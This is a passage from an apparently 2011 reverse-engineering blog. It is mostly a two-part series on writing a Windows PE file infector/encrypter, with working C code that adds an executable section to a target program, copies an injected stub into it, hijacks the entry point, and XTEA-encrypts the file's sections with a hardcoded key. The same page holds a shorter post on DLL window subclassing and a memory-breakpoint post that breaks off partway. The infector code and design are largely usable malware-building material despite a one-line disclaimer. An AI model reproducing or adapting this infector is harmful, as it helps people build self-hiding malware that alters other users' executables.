RCE Endeavors 😅

April 23, 2011

Writing a File Infector/Encrypter: PE File Modification/Section Injection (2/4)

Filed under: Cryptography,General x86,Reverse Engineering — admin @ 5:54 PM

This post focuses on how to write content into a portable executable (PE) file. The code shown consists of excerpts from the file infector, with explanations of their usage and functionality. The material makes the most sense in the context of the source code listing in part 4. Some good background reading and reference material:

  1. Microsoft PE and COFF specification
  2. An In-Depth Look into the Win32 Portable Executable File Format
  3. Inject your code to a Portable Executable

The third article is especially useful, but takes a much different approach to injecting code, and also does not work for applications that use randomized base addresses.

The general concept presented, and what is used in the file infector, is adding a new section to a PE file. The PE structure is best explored with tools such as LordPE. A PE file is organized into several structures, which hold offsets into the file for certain properties. This is best illustrated with a graphic:

The IMAGE_DOS_HEADER structure (reproduced below) is shown in the graphic above

typedef struct _IMAGE_DOS_HEADER
{
     WORD e_magic;
     WORD e_cblp;
     WORD e_cp;
     WORD e_crlc;
     WORD e_cparhdr;
     WORD e_minalloc;
     WORD e_maxalloc;
     WORD e_ss;
     WORD e_sp;
     WORD e_csum;
     WORD e_ip;
     WORD e_cs;
     WORD e_lfarlc;
     WORD e_ovno;
     WORD e_res[4];
     WORD e_oemid;
     WORD e_oeminfo;
     WORD e_res2[10];
     LONG e_lfanew;
} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

These match up with offsets in the file (e_magic is the first WORD in the file, e_cblp is the second WORD, and so on). The most important property here is e_lfanew. This is an offset to a different structure, IMAGE_NT_HEADERS (reproduced below):

typedef struct _IMAGE_NT_HEADERS {
  DWORD                 Signature;
  IMAGE_FILE_HEADER     FileHeader;
  IMAGE_OPTIONAL_HEADER OptionalHeader;
} IMAGE_NT_HEADERS, *PIMAGE_NT_HEADERS;

This structure contains two additional structures, IMAGE_FILE_HEADER and IMAGE_OPTIONAL_HEADER. The latter is reproduced below:

typedef struct _IMAGE_OPTIONAL_HEADER {
  WORD                 Magic;
  BYTE                 MajorLinkerVersion;
  BYTE                 MinorLinkerVersion;
  DWORD                SizeOfCode;
  DWORD                SizeOfInitializedData;
  DWORD                SizeOfUninitializedData;
  DWORD                AddressOfEntryPoint;
  DWORD                BaseOfCode;
  DWORD                BaseOfData;
  DWORD                ImageBase;
  DWORD                SectionAlignment;
  DWORD                FileAlignment;
  WORD                 MajorOperatingSystemVersion;
  WORD                 MinorOperatingSystemVersion;
  WORD                 MajorImageVersion;
  WORD                 MinorImageVersion;
  WORD                 MajorSubsystemVersion;
  WORD                 MinorSubsystemVersion;
  DWORD                Win32VersionValue;
  DWORD                SizeOfImage;
  DWORD                SizeOfHeaders;
  DWORD                CheckSum;
  WORD                 Subsystem;
  WORD                 DllCharacteristics;
  DWORD                SizeOfStackReserve;
  DWORD                SizeOfStackCommit;
  DWORD                SizeOfHeapReserve;
  DWORD                SizeOfHeapCommit;
  DWORD                LoaderFlags;
  DWORD                NumberOfRvaAndSizes;
  IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER, *PIMAGE_OPTIONAL_HEADER;

Together with IMAGE_FILE_HEADER, which holds the current number of sections, this structure provides the information needed to inject a section into a PE file: the required file alignment, the section alignment, the size of the image, and so on. The last important structure that is required is IMAGE_SECTION_HEADER (reproduced below):

typedef struct _IMAGE_SECTION_HEADER {
  BYTE  Name[IMAGE_SIZEOF_SHORT_NAME];
  union {
    DWORD PhysicalAddress;
    DWORD VirtualSize;
  } Misc;
  DWORD VirtualAddress;
  DWORD SizeOfRawData;
  DWORD PointerToRawData;
  DWORD PointerToRelocations;
  DWORD PointerToLinenumbers;
  WORD  NumberOfRelocations;
  WORD  NumberOfLinenumbers;
  DWORD Characteristics;
} IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;

This structure contains all of the important information about a section in a PE file. It is the structure that has to be (partially) filled out and then written into the file. It is written immediately after the last existing section header, and the NumberOfSections value in IMAGE_FILE_HEADER is incremented and saved so that the new section is recognized.

The general idea then is to map the file to memory, find the appropriate structures (IMAGE_DOS_HEADER and IMAGE_NT_HEADERS, IMAGE_SECTION_HEADER), and write our own IMAGE_SECTION_HEADER structure to the file.
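As a rough, read-only illustration of the "find the appropriate structures" step, the sketch below locates IMAGE_NT_HEADERS inside a plain byte buffer without depending on Windows.h. The helper names (read_u16, read_u32, find_nt_headers_offset) are hypothetical and do not come from the infector; the constants are the "MZ" and "PE\0\0" signatures and the offset of e_lfanew (0x3C) implied by the IMAGE_DOS_HEADER layout above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Reads a little-endian 16-bit value from a byte buffer. */
static uint16_t read_u16(const unsigned char *p) {
    return (uint16_t)(p[0] | (p[1] << 8));
}

/* Reads a little-endian 32-bit value from a byte buffer. */
static uint32_t read_u32(const unsigned char *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Hypothetical helper: returns the file offset of IMAGE_NT_HEADERS,
   or 0 if the buffer does not look like a PE file. */
size_t find_nt_headers_offset(const unsigned char *buf, size_t size) {
    assert(buf != NULL);
    /* The DOS header is 0x40 bytes long and starts with "MZ". */
    if (size < 0x40 || read_u16(buf) != 0x5A4D)
        return 0;
    /* e_lfanew is the last field of IMAGE_DOS_HEADER, at offset 0x3C. */
    uint32_t e_lfanew = read_u32(buf + 0x3C);
    if (e_lfanew > size || size - e_lfanew < 4)
        return 0;
    /* IMAGE_NT_HEADERS begins with the "PE\0\0" signature. */
    if (read_u32(buf + e_lfanew) != 0x00004550)
        return 0;
    return e_lfanew;
}
```

With a memory-mapped file, the returned offset added to the start of the mapping gives the same address that a cast to PIMAGE_NT_HEADERS would use.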

The function to map a file to memory is shown below:

bool map_file(const wchar_t *file_name, unsigned int stub_size, bool append_mode, pfile_info mapped_file_info) {
    void *file_handle = CreateFile(file_name, GENERIC_READ | GENERIC_WRITE, 0,
        NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if(file_handle == INVALID_HANDLE_VALUE) {
        wprintf(L"Could not open %s", file_name);
        return false;
    }
    unsigned int file_size = GetFileSize(file_handle, NULL);
    if(file_size == INVALID_FILE_SIZE) {
        wprintf(L"Could not get file size for %s", file_name);
        CloseHandle(file_handle);
        return false;
    }
    if(append_mode == true) {
        file_size += (stub_size + sizeof(DWORD_PTR));
    }
    void *file_map_handle = CreateFileMapping(file_handle, NULL, PAGE_READWRITE, 0,
        file_size, NULL);
    if(file_map_handle == NULL) {
        wprintf(L"File map could not be opened");
        CloseHandle(file_handle);
        return false;
    }
    void *file_mem_buffer = MapViewOfFile(file_map_handle, FILE_MAP_WRITE, 0, 0, file_size);
    if(file_mem_buffer == NULL) {
        wprintf(L"Could not map view of file");
        CloseHandle(file_map_handle);
        CloseHandle(file_handle);
        return false;
    }
    mapped_file_info->file_handle = file_handle;
    mapped_file_info->file_map_handle = file_map_handle;
    mapped_file_info->file_mem_buffer = (unsigned char*)file_mem_buffer;
    return true;
}

This function takes the target file name, a stub size (the number of bytes to write into the file), an append mode flag that is set when the file is being modified, and a pfile_info structure that is filled out upon a successful return. The append mode flag is needed because the target file is opened twice: the first time to obtain the section alignment, and a second time (after closing it) to write in the instructions with an aligned stub_size parameter. The function is a fairly straightforward use of the Windows API to map a file into memory. The file_info structure is shown below:

typedef struct {
    void *file_handle;
    void *file_map_handle;
    unsigned char *file_mem_buffer;
} file_info, *pfile_info;

Now that the file is mapped into memory, it is possible to obtain pointers to the appropriate structures. These can be obtained directly by typecasting the file buffer. An example of how to obtain them is shown below:

PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)target_file->file_mem_buffer;
PIMAGE_NT_HEADERS nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)dos_header + dos_header->e_lfanew);

Once the file is mapped, it is possible to start adding the section. The code to add a section is shown below:

//Reference: http://www.codeproject.com/KB/system/inject2exe.aspx
PIMAGE_SECTION_HEADER add_section(const char *section_name, unsigned int section_size, void *image_addr) {
    PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)image_addr;
    if(dos_header->e_magic != 0x5A4D) {
        wprintf(L"Could not retrieve DOS header from %p", image_addr);
        return NULL;
    }
    PIMAGE_NT_HEADERS nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)dos_header + dos_header->e_lfanew);
    if(nt_headers->OptionalHeader.Magic != 0x010B) {
        wprintf(L"Could not retrieve NT header from %p", dos_header);
        return NULL;
    }
    const int name_max_length = 8;
    PIMAGE_SECTION_HEADER last_section = IMAGE_FIRST_SECTION(nt_headers) + (nt_headers->FileHeader.NumberOfSections - 1);
    PIMAGE_SECTION_HEADER new_section = IMAGE_FIRST_SECTION(nt_headers) + (nt_headers->FileHeader.NumberOfSections);
    memset(new_section, 0, sizeof(IMAGE_SECTION_HEADER));
    new_section->Characteristics = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE;
    memcpy(new_section->Name, section_name, name_max_length);
    new_section->Misc.VirtualSize = section_size;
    new_section->PointerToRawData = align_to_boundary(last_section->PointerToRawData + last_section->SizeOfRawData,
        nt_headers->OptionalHeader.FileAlignment);
    new_section->SizeOfRawData = align_to_boundary(section_size, nt_headers->OptionalHeader.SectionAlignment);
    new_section->VirtualAddress = align_to_boundary(last_section->VirtualAddress + last_section->Misc.VirtualSize,
        nt_headers->OptionalHeader.SectionAlignment);
    nt_headers->OptionalHeader.SizeOfImage =  new_section->VirtualAddress + new_section->Misc.VirtualSize;
    nt_headers->FileHeader.NumberOfSections++;
    return new_section;
}

Understanding this function is pretty straightforward, as it follows what was said above. It takes in the name of the new section, the size of the new section (aligned to IMAGE_NT_HEADERS.IMAGE_OPTIONAL_HEADER.SectionAlignment), and the address of the memory mapped file. The IMAGE_DOS_HEADER and IMAGE_NT_HEADERS structures are obtained, and the properties in the IMAGE_NT_HEADERS structure are used to properly fill out a custom IMAGE_SECTION_HEADER structure. The last section header in the file is located and a new one is created directly after it. This structure describes the new section to be added. The important thing to note is that many of the properties need to be aligned. Once these properties are filled out, the size of the image is updated and the number of sections is incremented. Now the new section will be recognized. What is left to be done is to write the instructions that this section contains, and to change the entry point to point to this new section. Writing in the instructions is extremely simple:

void copy_stub_instructions(PIMAGE_SECTION_HEADER section, void *image_addr, void *stub_addr) {
    unsigned int stub_size = get_stub_size(stub_addr);
    memcpy(((unsigned char *)image_addr + section->PointerToRawData), stub_addr, stub_size);
}
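The add_section listing rounds several fields up with align_to_boundary, whose definition only appears in the full source in part 4. As a minimal sketch of what such a helper might look like (an assumption, not the author's implementation), the version below rounds a value up to the next multiple of an alignment that is a power of two, which holds for typical FileAlignment and SectionAlignment values such as 0x200 and 0x1000.

```c
#include <assert.h>

/* Hypothetical stand-in for the article's align_to_boundary:
   rounds value up to the next multiple of alignment.
   Assumes alignment is a nonzero power of two. */
unsigned int align_to_boundary(unsigned int value, unsigned int alignment) {
    assert(alignment != 0 && (alignment & (alignment - 1)) == 0);
    return (value + alignment - 1) & ~(alignment - 1);
}
```

For example, a raw data end offset of 0x1234 with a file alignment of 0x200 rounds up to 0x1400, while a value that is already aligned is returned unchanged.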

Changing the file entry point is slightly more complicated, but not by much. It is simply a matter of finding where the new data is and performing a bit of math to get the correct offset to set as the new entry point.

void change_file_oep(PIMAGE_NT_HEADERS nt_headers, PIMAGE_SECTION_HEADER section) {
    unsigned int file_address = section->PointerToRawData;
    PIMAGE_SECTION_HEADER current_section = IMAGE_FIRST_SECTION(nt_headers);
    for(int i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
        if(file_address >= current_section->PointerToRawData &&
            file_address < (current_section->PointerToRawData + current_section->SizeOfRawData)){
                file_address -= current_section->PointerToRawData;
                file_address += (nt_headers->OptionalHeader.ImageBase + current_section->VirtualAddress);
                break;
        }
    ++current_section;
    }
    nt_headers->OptionalHeader.AddressOfEntryPoint =  file_address - nt_headers->OptionalHeader.ImageBase;
}
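The arithmetic in change_file_oep adds ImageBase and then subtracts it again, so the net effect is a conversion from a file offset to a relative virtual address (RVA), which is what AddressOfEntryPoint stores. The sketch below isolates that conversion using a reduced stand-in for IMAGE_SECTION_HEADER; the section_info type and file_offset_to_rva name are hypothetical and only carry the three fields the calculation needs.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Minimal stand-in for the IMAGE_SECTION_HEADER fields used here. */
typedef struct {
    uint32_t VirtualAddress;   /* RVA of the section when loaded */
    uint32_t SizeOfRawData;    /* size of the section in the file */
    uint32_t PointerToRawData; /* file offset of the section */
} section_info;

/* Hypothetical helper: converts a file offset to an RVA.
   Returns 0 if no section contains the offset. */
uint32_t file_offset_to_rva(const section_info *sections, unsigned int count,
                            uint32_t file_offset) {
    assert(sections != NULL);
    for (unsigned int i = 0; i < count; ++i) {
        const section_info *s = &sections[i];
        if (file_offset >= s->PointerToRawData &&
            file_offset - s->PointerToRawData < s->SizeOfRawData) {
            /* Offset within the section, rebased onto its RVA. */
            return file_offset - s->PointerToRawData + s->VirtualAddress;
        }
    }
    return 0;
}
```

With a section whose raw data starts at file offset 0xA00 and which is loaded at RVA 0x2000, file offset 0xA10 maps to RVA 0x2010.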

And finally, the last thing to do is to encrypt the entire file, with the exception of the written stub (which includes the decryption routine) and the .rdata and .rsrc sections, since those contain only initialized data and resources, respectively. The encryption routine used is the eXtended TEA (XTEA) block cipher. Every 8 bytes of program data are run through 32 rounds of the cipher and written back to the file. The implementation is shown below:

void encrypt_file(PIMAGE_NT_HEADERS nt_headers, pfile_info target_file, const char *excluded_section_name) {
    PIMAGE_SECTION_HEADER current_section = IMAGE_FIRST_SECTION(nt_headers);
    const char *excluded_sections[] = {".rdata", ".rsrc", excluded_section_name};
    for(int i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
        int excluded = 1;
        for(int j = 0; j < sizeof(excluded_sections)/sizeof(excluded_sections[0]); ++j)
            excluded &= strcmp(excluded_sections[j], (char *)current_section->Name);
        if(excluded != 0) {
            unsigned char *section_start = 
                (unsigned char *)target_file->file_mem_buffer + current_section->PointerToRawData;
            unsigned char *section_end = section_start + current_section->SizeOfRawData;
            const unsigned int num_rounds = 32;
            const unsigned int key[] = {0x12345678, 0xAABBCCDD, 0x10101010, 0xF00DBABE};
            for(unsigned char *k = section_start; k < section_end; k += 8) {
                unsigned int block1 = (*k << 24) | (*(k+1) << 16) | (*(k+2) << 8) | *(k+3);
                unsigned int block2 = (*(k+4) << 24) | (*(k+5) << 16) | (*(k+6) << 8) | *(k+7);
                unsigned int full_block[] = {block1, block2};
                encrypt(num_rounds, full_block, key);
                full_block[0] = swap_endianess(full_block[0]);
                full_block[1] = swap_endianess(full_block[1]);
                memcpy(k, full_block, sizeof(full_block));
            }
        }
        current_section++;
    }
}
 
//Encryption/decryption routines modified from http://en.wikipedia.org/wiki/XTEA
void encrypt(unsigned int num_rounds, unsigned int blocks[2], unsigned int const key[4]) {
    const unsigned int delta = 0x9E3779B9;
    unsigned int sum = 0;
    for (unsigned int i = 0; i < num_rounds; ++i) {
        blocks[0] += (((blocks[1] << 4) ^ (blocks[1] >> 5)) + blocks[1]) ^ (sum + key[sum & 3]);
        sum += delta;
        blocks[1] += (((blocks[0] << 4) ^ (blocks[0] >> 5)) + blocks[0]) ^ (sum + key[(sum >> 11) & 3]);
    }
}
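To see that the round function above is reversible, it can help to pair it with the matching inverse from the same public XTEA reference code. The sketch below is a portable restatement using fixed-width types; the function names xtea_encrypt and xtea_decrypt are chosen here for illustration, and the decryption routine is the standard reference one rather than the stub from part 3.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define XTEA_DELTA 0x9E3779B9u

/* Same round structure as the encrypt routine in the article. */
void xtea_encrypt(unsigned int num_rounds, uint32_t v[2], const uint32_t key[4]) {
    assert(v != NULL && key != NULL);
    uint32_t v0 = v[0], v1 = v[1], sum = 0;
    for (unsigned int i = 0; i < num_rounds; ++i) {
        v0 += (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
        sum += XTEA_DELTA;
        v1 += (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
    }
    v[0] = v0;
    v[1] = v1;
}

/* Inverse: starts from the final sum and undoes each half-round in reverse order. */
void xtea_decrypt(unsigned int num_rounds, uint32_t v[2], const uint32_t key[4]) {
    assert(v != NULL && key != NULL);
    uint32_t v0 = v[0], v1 = v[1], sum = XTEA_DELTA * num_rounds;
    for (unsigned int i = 0; i < num_rounds; ++i) {
        v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
        sum -= XTEA_DELTA;
        v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
    }
    v[0] = v0;
    v[1] = v1;
}
```

Encrypting a two-word block and then decrypting it with the same key and round count should return the original two words, which is a quick sanity check for any modification made to the routines.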

With all that done, the changes can be saved with FlushViewOfFile, after which the file can be unmapped from memory.

A downloadable PDF of this post can be found here

Writing a File Infector/Encrypter: Background (1/4)

Filed under: Cryptography,General x86,Reverse Engineering — admin @ 5:53 PM

This next series of posts will focus on explaining a file infector/encrypter that I wrote a week or so ago. It works with any PE32 executable file, overcomes issues with randomized base addresses, and takes advantage of Visual Studio’s C++ compiler to generate the assembly code to inject into the target. This allows large portions of the injected code to be written in C and greatly speeds up development time. Lastly, the target file is also encrypted by the infector, and a decryption routine is written in to decrypt the file image at runtime. The series will be broken up into the four parts listed below:

  1. Background
  2. PE file modification/section injection
  3. Writing the compiled stub
  4. Full source code and remarks

Since this post focuses on the background of the project, there will be no (relevant) code contained in it. This post will discuss the high-level concepts behind the infector, the issues that arise while developing something like this, and provide an overview of the architecture of the infector. The usual warnings come with this article, such as using it only to enhance your knowledge and not being a script kiddie who rips the code to spread malware.

A file infector is simply an application that adds code to another executable in the hope of having that code executed. This code can itself be an infector which continues to spread to other files, or it can just be an arbitrary block of code with some defining purpose. Simply introducing code to a file is not enough though, as the normal control flow of the target process would never invoke it. Therefore, there are two main options. The first is to overwrite parts of the target file with a jump to the added code, which is usually placed in a code cave. This includes variations such as writing the code into a subroutine and jumping to a block containing parts of the original code. The other option is to hijack the entry point of the target file and modify it so the process starts up and immediately executes the desired code. The two techniques are illustrated below:

The original control flow of an application

The hijacked version, with a jump to what was an empty part of the process, but now would contain instructions to execute

The added instructions to be executed. The overwritten code is restored at the end and a jump returns control flow back to normal.

The other mentioned technique, modifying the entry point:

The entry point is an offset from the image base and denotes where the program begins execution. It is possible to take control of the application by modifying the entry point to point to the added code block, then jumping from the added code block to the original entry point. One thing to note though is that the ImageBase value is not always reliable, since applications linked with /DYNAMICBASE in Visual Studio (or whatever appropriate linker flag with different compilers) will have a “randomized” base address. This means that the jump back into the original entry point cannot have a hardcoded address (0x00400000 + 0x000153B7 in this case), but instead needs to be found by the injected code at runtime.
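The relationship between the image base and the entry point can be written out as plain arithmetic. The sketch below is illustrative only and uses hypothetical helper names; it takes the preferred base and entry point offset quoted above (0x00400000 and 0x000153B7) and shows how the same offset resolves to a different address when the image is loaded elsewhere. The alternate base 0x00A70000 is an arbitrary example value, and 32-bit addresses are assumed since the target is PE32.

```c
#include <assert.h>
#include <stdint.h>

/* Virtual address of the entry point for a given load base. */
uint32_t entry_point_va(uint32_t load_base, uint32_t entry_point_rva) {
    return load_base + entry_point_rva;
}

/* Translates an address computed against the preferred base into the
   address it has when the image is actually loaded at actual_base. */
uint32_t rebase_address(uint32_t va, uint32_t preferred_base, uint32_t actual_base) {
    assert(va >= preferred_base);
    return va - preferred_base + actual_base;
}
```

With the preferred base the entry point is at 0x004153B7; with a randomized base of 0x00A70000 the same offset lands at 0x00A853B7, which is why a hardcoded jump target is unreliable.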

The next issue arises when the injected code wants to call any Windows API functions. Load addresses of kernel32.dll, ntdll.dll, and user32.dll are not guaranteed to always be the same, and DLLs such as Ws2_32.dll, Shlwapi.dll, and so on are not even guaranteed to be loaded. This means that call addresses to the Windows API cannot be hardcoded, and it also means that additional DLLs may have to be loaded in order to use their functionality. The good news is that since kernel32.dll is loaded into every process, its load address can be obtained from the process environment block (PEB). Then the export address table (EAT) of kernel32.dll can be walked and the address of LoadLibrary can be obtained to load additional DLLs. All exported functions in the DLL can be found through the function name table, with the function and ordinal tables used to obtain the address (more on this in part 3).

The last issue is that functions in the C runtime cannot be used. Again, this issue arises because of randomized base addresses — the address of the desired function simply cannot be hardcoded into the piece of code to be injected. This means that the functions will have to be implemented in assembly. This really isn’t too bad — for my version I only implemented strlen and a variation on strcmp, both needed when traversing the function name table.

The architecture of the infector has two main components: the injection function which will be injected into the target, and the code to map the file, add the code, modify the entry point, and so on. The injection function will be entirely self contained, and written in C and assembly. The C compiler will be leveraged to generate the assembly instructions that will be injected into the target. At runtime, the infector will calculate the length of the injection function, modify part of the function to insert the correct entry point offset, write the instructions into the target file, and lastly modify the entry point of the target file to execute the function upon loading. Lastly, the file will be encrypted. The role of the injection function is to decrypt the contents at runtime and continue normal execution.

A downloadable PDF of this post can be found here

April 17, 2011

Extending External Window Functionality

Filed under: General x86,General x86-64 — admin @ 4:12 PM

An interesting thing I saw many years ago was a plug-in for an old gaming client that added a lot of functionality. Some of the things were simple changes such as just modifying the resources to give the client a sleeker look. Other things were more interesting though, and included adding custom menus, both to the menu bar and context menus. This was interesting since everything was contained in separate DLLs, which were loaded by the process on startup (parts of the executable were rewritten to jump to loader code). When finding out how this works, I found that it was pretty easy to do. Injected/loaded DLLs are within the address space of the process, so doing all of this is more or less similar to how it would be done when normally developing a GUI application with the Windows API. Unfortunately, this technique is not as widely applicable as it was back then. Custom GUI APIs and new additions to Windows such as floating and dockable menus make this technique in its current form less useful. I wanted to put the code that I wrote several years ago on here for archive purposes. The code is old and could possibly be written to be a bit cleaner.

#include <Windows.h>
 
typedef struct _PROCESSWNDINFO {
    HWND hWnd;
    HMENU hMenuBar;
    HMENU hAddedMenu;
    LONG_PTR PrevWndProc;
} PROCESSWNDINFO, *LPPROCESSWNDINFO;
 
const DWORD MENUITEM_ID = 1234;
PROCESSWNDINFO g_WindowInfo;
 
LRESULT CALLBACK SubclassWndProc(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam) {
    switch(Msg) {
        case WM_COMMAND:
            switch(LOWORD(wParam)) {
            case MENUITEM_ID:
                MessageBox(NULL, L"Added Handler!", L"New item", MB_ICONASTERISK);
                break;
            }
        break;
 
    default: break;
    }
    return CallWindowProc((WNDPROC)g_WindowInfo.PrevWndProc, hWnd, Msg, wParam, lParam);
}
 
BOOL CALLBACK EnumWindowProc(HWND hWnd, LPARAM processId) {
    const INT WINDOW_LENGTH = 32;
    WCHAR windowClass[WINDOW_LENGTH] = {0};
    GetClassName(hWnd, windowClass, WINDOW_LENGTH);
    if(wcscmp(windowClass, L"GDI+ Hook Window Class") == 0)
        return TRUE;
    DWORD windowProcessId = 0;
    (VOID)GetWindowThreadProcessId(hWnd, &windowProcessId);
    if(windowProcessId == (DWORD)processId) {
        g_WindowInfo.hWnd = hWnd;
        return FALSE;
    }
    return TRUE;
}
 
BOOL GetWindowProperties(LPPROCESSWNDINFO windowInfo) {
    EnumWindows((WNDENUMPROC)EnumWindowProc, (LPARAM)GetCurrentProcessId());
    if(windowInfo->hWnd != NULL) {
        windowInfo->hMenuBar = GetMenu(g_WindowInfo.hWnd);
        windowInfo->PrevWndProc = GetWindowLongPtr(windowInfo->hWnd, GWLP_WNDPROC);
        return TRUE;
    }
    return FALSE;
}
 
HMENU AddNewMenu(LPPROCESSWNDINFO windowInfo, LPCWSTR title) {
    HMENU hNewMenu = CreateMenu();
    if(hNewMenu != NULL && windowInfo->hMenuBar != NULL)
        if(AppendMenu(windowInfo->hMenuBar, MF_STRING | MF_POPUP, (UINT_PTR)hNewMenu, title) != 0)
            return hNewMenu;
    return NULL;
}
 
BOOL AddNewMenuItem(LPPROCESSWNDINFO windowInfo, HMENU hMenu, LPCWSTR title, const DWORD id) {
    BOOL ret = FALSE;
    if(hMenu != NULL)
        ret = AppendMenu(hMenu, MF_STRING, id, title);
    if(windowInfo->hMenuBar != NULL)
        DrawMenuBar(windowInfo->hWnd);
    return ret;
}
 
int APIENTRY DllMain(HMODULE hModule, DWORD reason, LPVOID reserved) {
    if(reason == DLL_PROCESS_ATTACH) {
        DisableThreadLibraryCalls(hModule);
        if(GetWindowProperties(&g_WindowInfo) == TRUE) {
            g_WindowInfo.hAddedMenu = AddNewMenu(&g_WindowInfo, L"Test");
            AddNewMenuItem(&g_WindowInfo, g_WindowInfo.hAddedMenu, L"Hello", MENUITEM_ID);
            g_WindowInfo.PrevWndProc = SetWindowLongPtr(g_WindowInfo.hWnd, GWLP_WNDPROC, (LONG_PTR)SubclassWndProc);
        }
    }
    return TRUE;
}
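For WM_COMMAND, the menu item identifier is carried in the low-order word of wParam, and the high-order word is 0 when the message comes from a menu. The sketch below shows that decoding in portable C without Windows.h; low_word, high_word, and is_menu_command are hypothetical names standing in for what the LOWORD and HIWORD macros do in a real window procedure.

```c
#include <assert.h>
#include <stdint.h>

/* Portable equivalents of the LOWORD/HIWORD macros. */
static uint16_t low_word(uintptr_t value) {
    return (uint16_t)(value & 0xFFFF);
}

static uint16_t high_word(uintptr_t value) {
    return (uint16_t)((value >> 16) & 0xFFFF);
}

/* Returns 1 if a WM_COMMAND wParam refers to the given menu item.
   A high-order word of 0 means the message originated from a menu. */
int is_menu_command(uintptr_t wparam, uint16_t item_id) {
    return high_word(wparam) == 0 && low_word(wparam) == item_id;
}
```

Comparing only the low-order word against the identifier keeps the handler from missing or misreading messages whose high-order word is nonzero, such as accelerator or control notifications.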

The success of the entire technique relies on the fact that GetMenu returns a valid handle to the menu. If this does not happen (the menu bar is actually not a standard menu), then the result is that nothing will happen. It is still possible to append menus/menu items in the case that the menu is not a standard menu. However, this involves reversing the application to see how menus are implemented and handled, or finding the documentation for the graphics API that is being used if it is available. What the code above does is find the window corresponding to the process identifier that this DLL is injected to or loaded from. Once the HWND is found, it is used to get the handle to the menu with

windowInfo->hMenuBar = GetMenu(g_WindowInfo.hWnd);

This handle is used to append the new menu to the menu bar (with AppendMenu). After that, any additional menu items can be appended to that added menu. SetWindowLongPtr is used to set a new window procedure, with the old one being stored to be called later. The handler for the menu items can be implemented in this callback like normal, with control being passed to the original window procedure at the end. One good thing about this technique is that it is done completely through the Windows API, ensuring 32-bit and 64-bit compatibility, ignoring minor details like using SetWindowLongPtr instead of SetWindowLong. If something like this were to be done through API hooks on the window procedure of the application, then there would be the hassle of finding a 32/64-bit compatible hooking library. This code was (re)tested on Windows 7 64-bit. Screenshots for 64/32-bit test applications are shown below. Notice the added “Test” menu.

64-bit Minesweeper application:

32-bit DebugView application:

Source file can be found here
A downloadable PDF of this post can be found here

March 25, 2011

Follow-up: Memory Breakpoints

Filed under: General x86 — admin @ 8:13 PM

A quick follow-up to the previous post on hardware breakpoints. One limitation that people run into when using hardware breakpoints is that they are limited to four addresses to break on within a thread. This is true, and something that cannot be overcome. There are some interesting techniques like executing instructions in one thread through a different one with breakpoints on it, but something like that is rarely done and hardly worth the effort to code correctly. The next viable alternative is memory breakpoints. This involves marking the page that the desired address is on as a guard page. As the MSDN documentation says, once a page is marked as a guard page, any access to it raises a STATUS_GUARD_PAGE_VIOLATION exception. The guard flag is then removed and any further accesses are allowed, assuming the guard flag has not been set again. The technique then is simple: find the page that the desired address is on, set it as a guard page, and catch the exception. There is a slight nuance however. Since access to any instruction on the page triggers the STATUS_GUARD_PAGE_VIOLATION exception, trying to reset the guard page status and continue execution in the handler will just result in a loop. A jump to a stub function cannot be used since it is not known what address raised the exception. Thus, the EIP also cannot be safely modified in the STATUS_GUARD_PAGE_VIOLATION handler. What is required is setting the trap flag (0x100 in EFLAGS) so that the EIP advances before the EXCEPTION_SINGLE_STEP is raised. This EXCEPTION_SINGLE_STEP is also caught, and that is where everything takes place. Just like with hardware breakpoints, all that is needed is to check if ExceptionAddress is equal to the desired address. If so, then you’ve got the context of the thread and can do as you please. The important thing is to set the page back to a guard page prior to leaving the handler. The exception handler and the code that adds the breakpoint are shown below.
The code is written for the test application from the hardware breakpoints article and is attached below.
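Because the guard flag applies to a whole page, every address that shares a page with the target triggers the exception, which is why the handler has to compare ExceptionAddress against the desired address. The sketch below illustrates that granularity with hypothetical helpers and an assumed page size of 0x1000 bytes (the usual x86 value; real code would query it rather than hardcode it).

```c
#include <assert.h>
#include <stdint.h>

/* Assumed page size; typical for x86 but not guaranteed everywhere. */
#define ASSUMED_PAGE_SIZE 0x1000u

/* Base address of the page containing the given address. */
uintptr_t page_base(uintptr_t address) {
    return address & ~(uintptr_t)(ASSUMED_PAGE_SIZE - 1);
}

/* Returns 1 if both addresses fall on the same page, meaning an access
   to either one trips a guard flag set for the other. */
int same_page(uintptr_t a, uintptr_t b) {
    return page_base(a) == page_base(b);
}
```

For a target at 0x00401000, an access anywhere from 0x00401000 through 0x00401FFF raises the guard page exception, while 0x00402000 belongs to the next page and does not.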

Exception handler:

LONG WINAPI ExceptionFilter(PEXCEPTION_POINTERS ExceptionInfo) {
    if(ExceptionInfo->ExceptionRecord->ExceptionCode == STATUS_GUARD_PAGE_VIOLATION) {        
        ExceptionInfo->ContextRecord->EFlags |= 0x100;
        return EXCEPTION_CONTINUE_EXECUTION;
    }
    else if(ExceptionInfo->ExceptionRecord->ExceptionCode == EXCEPTION_SINGLE_STEP) {
        if((DWORD)ExceptionInfo->ExceptionRecord->ExceptionAddress == (DWORD)func_addr) {
            PCONTEXT debug_context = ExceptionInfo->ContextRecord;
            printf("Breakpoint hit!\n");
            print_parameters(debug_context);
